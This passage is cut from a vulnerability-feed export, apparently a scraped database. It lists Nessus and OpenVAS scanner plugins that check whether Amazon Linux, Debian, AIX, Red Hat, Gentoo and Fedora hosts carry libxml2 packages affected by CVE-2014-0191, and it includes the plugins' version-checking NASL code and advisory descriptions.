Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: 
\"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"libxml2-2.9.1-1.1.30.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"libxml2-debuginfo-2.9.1-1.1.30.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"libxml2-devel-2.9.1-1.1.30.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"libxml2-python-2.9.1-1.1.30.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"libxml2-static-2.9.1-1.1.30.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libxml2 / libxml2-debuginfo / libxml2-devel / libxml2-python / etc\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-12T09:48:40", "description": "Daniel P. Berrange discovered a denial of service vulnerability in\nlibxml2 entity substitution.", "edition": 15, "published": "2014-07-15T00:00:00", "title": "Debian DSA-2978-1 : libxml2 - security update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0191"], "modified": "2014-07-15T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:libxml2", "cpe:/o:debian:debian_linux:7.0"], "id": "DEBIAN_DSA-2978.NASL", "href": "https://www.tenable.com/plugins/nessus/76499", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-2978. 
The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(76499);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-0191\");\n script_bugtraq_id(67233);\n script_xref(name:\"DSA\", value:\"2978\");\n\n script_name(english:\"Debian DSA-2978-1 : libxml2 - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Daniel P. Berrange discovered a denial of service vulnerability in\nlibxml2 entity substitution.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/libxml2\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2014/dsa-2978\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the libxml2 packages.\n\nFor the stable distribution (wheezy), this problem has been fixed in\nversion 2.8.0+dfsg1-7+wheezy1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libxml2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/07/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", 
value:\"2014/07/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"libxml2\", reference:\"2.8.0+dfsg1-7+wheezy1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libxml2-dbg\", reference:\"2.8.0+dfsg1-7+wheezy1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libxml2-dev\", reference:\"2.8.0+dfsg1-7+wheezy1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libxml2-doc\", reference:\"2.8.0+dfsg1-7+wheezy1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libxml2-utils\", reference:\"2.8.0+dfsg1-7+wheezy1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libxml2-utils-dbg\", reference:\"2.8.0+dfsg1-7+wheezy1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"python-libxml2\", reference:\"2.8.0+dfsg1-7+wheezy1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"python-libxml2-dbg\", reference:\"2.8.0+dfsg1-7+wheezy1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-06T09:18:27", "description": "The remote host is missing AIX PTF U862099, which is related to the\nsecurity of the package 
bos.rte.control.\n\nLibxml2 is vulnerable to a denial of service, caused by the expansion\nof internal entities within the xmlParserHandlePEReference().", "edition": 23, "published": "2014-11-10T00:00:00", "title": "AIX 7.1 TL 3 : bos.rte.control (U862099)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0191"], "modified": "2014-11-10T00:00:00", "cpe": ["cpe:/o:ibm:aix:7.1"], "id": "AIX_U862099.NASL", "href": "https://www.tenable.com/plugins/nessus/79063", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were extracted\n# from AIX Security PTF U862099. The text itself is copyright (C)\n# International Business Machines Corp.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(79063);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2014-0191\");\n\n script_name(english:\"AIX 7.1 TL 3 : bos.rte.control (U862099)\");\n script_summary(english:\"Check for PTF U862099\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote AIX host is missing a vendor-supplied security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is missing AIX PTF U862099, which is related to the\nsecurity of the package bos.rte.control.\n\nLibxml2 is vulnerable to a denial of service, caused by the expansion\nof internal entities within the xmlParserHandlePEReference().\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www-01.ibm.com/support/docview.wss?uid=isg1IV62450\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install the appropriate missing security-related fix.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:ibm:aix:7.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/07/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/07/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"AIX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AIX/oslevel\", \"Host/AIX/version\", \"Host/AIX/lslpp\");\n\n exit(0);\n}\n\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"aix.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif ( ! get_kb_item(\"Host/AIX/version\") ) audit(AUDIT_OS_NOT, \"AIX\");\nif ( ! get_kb_item(\"Host/AIX/lslpp\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nflag = 0;\n\nif ( aix_check_patch(ml:\"710003\", patch:\"U862099\", package:\"bos.rte.control.7.1.3.30\") < 0 ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:aix_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}], "openvas": [{"lastseen": "2019-05-29T18:37:29", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0191"], "description": "Daniel P. 
Berrange discovered a denial of service vulnerability in\nlibxml2 entity substitution.", "modified": "2019-03-19T00:00:00", "published": "2014-07-11T00:00:00", "id": "OPENVAS:1361412562310702978", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310702978", "type": "openvas", "title": "Debian Security Advisory DSA 2978-1 (libxml2 - security update)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2978.nasl 14302 2019-03-19 08:28:48Z cfischer $\n# Auto-generated from advisory DSA 2978-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.702978\");\n script_version(\"$Revision: 14302 $\");\n script_cve_id(\"CVE-2014-0191\");\n script_name(\"Debian Security Advisory DSA 2978-1 (libxml2 - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-19 09:28:48 +0100 (Tue, 19 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-07-11 00:00:00 +0200 (Fri, 11 Jul 2014)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2014/dsa-2978.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB7\");\n script_tag(name:\"affected\", value:\"libxml2 on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (wheezy), this problem has been fixed in\nversion 2.8.0+dfsg1-7+wheezy1.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 2.9.1+dfsg1-4.\n\nWe recommend that you upgrade your libxml2 packages.\");\n script_tag(name:\"summary\", value:\"Daniel P. 
Berrange discovered a denial of service vulnerability in\nlibxml2 entity substitution.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"libxml2\", ver:\"2.8.0+dfsg1-7+wheezy1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libxml2-dbg\", ver:\"2.8.0+dfsg1-7+wheezy1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libxml2-dev\", ver:\"2.8.0+dfsg1-7+wheezy1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libxml2-doc\", ver:\"2.8.0+dfsg1-7+wheezy1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libxml2-utils\", ver:\"2.8.0+dfsg1-7+wheezy1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libxml2-utils-dbg\", ver:\"2.8.0+dfsg1-7+wheezy1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"python-libxml2\", ver:\"2.8.0+dfsg1-7+wheezy1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"python-libxml2-dbg\", ver:\"2.8.0+dfsg1-7+wheezy1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:37:03", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0191"], "description": "The remote host is missing an update for the ", "modified": "2018-11-23T00:00:00", "published": "2015-03-31T00:00:00", "id": "OPENVAS:1361412562310871346", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871346", "type": "openvas", "title": "RedHat Update for libxml2 RHSA-2015:0749-01", 
"sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for libxml2 RHSA-2015:0749-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871346\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-03-31 07:09:15 +0200 (Tue, 31 Mar 2015)\");\n script_cve_id(\"CVE-2014-0191\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"RedHat Update for libxml2 RHSA-2015:0749-01\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'libxml2'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The libxml2 library is a development toolbox 
providing the implementation\nof various XML standards.\n\nIt was discovered that libxml2 loaded external parameter entities even when\nentity substitution was disabled. A remote attacker able to provide a\nspecially crafted XML file to an application linked against libxml2 could\nuse this flaw to conduct XML External Entity (XXE) attacks, possibly\nresulting in a denial of service or an information leak on the system.\n(CVE-2014-0191)\n\nThe CVE-2014-0191 issue was discovered by Daniel P. Berrange of Red Hat.\n\nAll libxml2 users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. The desktop must be\nrestarted (log out, then log back in) for this update to take effect.\");\n script_tag(name:\"affected\", value:\"libxml2 on Red Hat Enterprise Linux Server (v. 7)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_xref(name:\"RHSA\", value:\"2015:0749-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2015-March/msg00054.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_7\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_7\")\n{\n\n if ((res = isrpmvuln(pkg:\"libxml2\", rpm:\"libxml2~2.9.1~5.el7_1.2\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libxml2-debuginfo\", rpm:\"libxml2-debuginfo~2.9.1~5.el7_1.2\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
isrpmvuln(pkg:\"libxml2-devel\", rpm:\"libxml2-devel~2.9.1~5.el7_1.2\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libxml2-python\", rpm:\"libxml2-python~2.9.1~5.el7_1.2\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:36:52", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0191"], "description": "Gentoo Linux Local Security Checks GLSA 201409-08", "modified": "2018-10-26T00:00:00", "published": "2015-09-29T00:00:00", "id": "OPENVAS:1361412562310121271", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310121271", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201409-08", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa-201409-08.nasl 12128 2018-10-26 13:35:25Z cfischer $\n#\n# Gentoo Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.121271\");\n script_version(\"$Revision: 12128 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-29 11:27:54 +0300 (Tue, 29 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 15:35:25 +0200 (Fri, 26 Oct 2018) $\");\n script_name(\"Gentoo Security Advisory GLSA 201409-08\");\n script_tag(name:\"insight\", value:\"A vulnerability in the xmlParserHandlePEReference() function of parser.c, when expanding entity references, can be exploited to consume large amounts of memory and cause a crash or hang.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://security.gentoo.org/glsa/201409-08\");\n script_cve_id(\"CVE-2014-0191\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Gentoo Linux Local Security Checks GLSA 201409-08\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Gentoo Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\n\nif((res=ispkgvuln(pkg:\"dev-libs/libxml2\", unaffected: make_list(\"ge 2.9.1-r4\"), vulnerable: make_list(\"lt 2.9.1-r4\"))) 
!= NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:36:33", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0191"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2015-01-05T00:00:00", "id": "OPENVAS:1361412562310868769", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868769", "type": "openvas", "title": "Fedora Update for mingw-libxml2 FEDORA-2014-17573", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mingw-libxml2 FEDORA-2014-17573\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868769\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-01-05 14:50:49 +0100 (Mon, 05 Jan 2015)\");\n script_cve_id(\"CVE-2014-0191\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_name(\"Fedora Update for mingw-libxml2 FEDORA-2014-17573\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'mingw-libxml2'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"mingw-libxml2 on Fedora 20\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2014-17573\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2015-January/147322.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC20\");\n\n 
exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"mingw-libxml2\", rpm:\"mingw-libxml2~2.9.2~1.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-03-17T23:00:38", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0191"], "description": "The remote host is missing an update announced via the referenced Security Advisory.", "modified": "2020-03-13T00:00:00", "published": "2015-09-08T00:00:00", "id": "OPENVAS:1361412562310120474", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120474", "type": "openvas", "title": "Amazon Linux: Security Advisory (ALAS-2014-341)", "sourceData": "# Copyright (C) 2015 Eero Volotinen\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120474\");\n script_version(\"2020-03-13T13:19:50+0000\");\n script_tag(name:\"creation_date\", value:\"2015-09-08 13:27:15 +0200 (Tue, 08 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"2020-03-13 13:19:50 +0000 (Fri, 13 Mar 2020)\");\n script_name(\"Amazon Linux: Security Advisory (ALAS-2014-341)\");\n script_tag(name:\"insight\", value:\"It was discovered that libxml2, a library providing support to read, modify and write XML files, incorrectly performs entity substitution in the doctype prolog, even if the application using libxml2 disabled any entity substitution. A remote attacker could provide a specially-crafted XML file that, when processed, would lead to the exhaustion of CPU and memory resources or file descriptors.\");\n script_tag(name:\"solution\", value:\"Run yum update libxml2 to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2014-341.html\");\n script_cve_id(\"CVE-2014-0191\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"The remote host is missing an update announced via the referenced Security Advisory.\");\n script_copyright(\"Copyright (C) 2015 Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n
